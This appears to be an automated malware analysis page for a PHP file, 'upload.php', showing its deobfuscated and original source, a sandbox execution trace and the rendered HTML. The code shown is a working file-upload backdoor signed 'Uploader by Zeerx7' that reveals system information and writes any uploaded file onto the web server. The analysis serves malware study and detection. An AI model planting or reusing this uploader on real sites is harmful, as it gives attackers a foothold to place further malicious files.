PHP Malware Analysis
upload.php
md5: f05325f7c6ebd244fe4a47e0c3da62ba
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- php_uname (Deobfuscated, Original, Traces)
Files
- copy (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<?php
echo '#sess#ok#<center><pre>' . php_uname() . "\n" . '<b>{ Uploader by Zeerx7 }</b><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload>>"></form>';
if ($_POST) {
if (@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])) {
echo "<b>Ok Uploaded";
} else {
echo "<b>Not uploaded!";
}
}Execution traces
data/traces/f05325f7c6ebd244fe4a47e0c3da62ba_trace-1676247854.7424.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:24:40.640204]
1 0 1 0.000147 393528
1 3 0 0.000201 395664 {main} 1 /var/www/html/uploads/upload.php 0 0
2 4 0 0.000218 395664 php_uname 0 /var/www/html/uploads/upload.php 1 0
2 4 1 0.000233 395776
2 4 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 3 1 0.000256 395664
0.000280 314240
TRACE END [2023-02-12 22:24:40.640369]
Generated HTML code
<html><head></head><body>#sess#ok#<center><pre>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64
<b>{ Uploader by Zeerx7 }</b><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload>>"></form></pre></center></body></html>Original PHP code
<?php echo '#sess#ok#<center><pre>'.php_uname()."\n".'<b>{ Uploader by Zeerx7 }</b><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload>>"></form>';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo '<b>Ok Uploaded';}else{echo '<b>Not uploaded!';}}?>